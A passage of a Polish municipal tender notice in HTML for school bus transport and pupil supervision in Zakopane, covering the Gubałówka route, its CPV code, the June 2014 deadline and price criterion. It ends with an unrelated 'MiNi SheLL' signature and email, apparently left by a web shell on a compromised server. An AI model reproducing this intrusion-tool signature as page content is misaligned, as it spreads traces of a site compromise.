 UWAGA!!!    Na tej trasie występuje ograniczenie rzeczywistej masy pojazdów do 5 ton.  Jeżeli przewóz będzie się odbywał przez Kościelisko, koniecznym jest aby pojazd dojeżdżał do Furmanowej I..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Gimnazjum nr 1 oraz Szkoły Podstawowej nr 5 i z powrotem, tj. z ww szkół na Gubałówkę.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2013-2014

 Zakres zamówienia obejmuje usługę dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Gimnazjum nr 1 oraz Szkoły Podstawowej nr 5 i z powrotem, tj. z ww szkół na Gubałówkę - przewidywana ilość 38 uczniów. 

Uwaga!!! Na tej trasie występuje ograniczenie rzeczywistej masy pojazdów do 5 ton. Jeżeli przewóz będzie się odbywał od strony Zębu, koniecznym jest aby pojazd dojeżdżał Gubałówka Kaplica..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com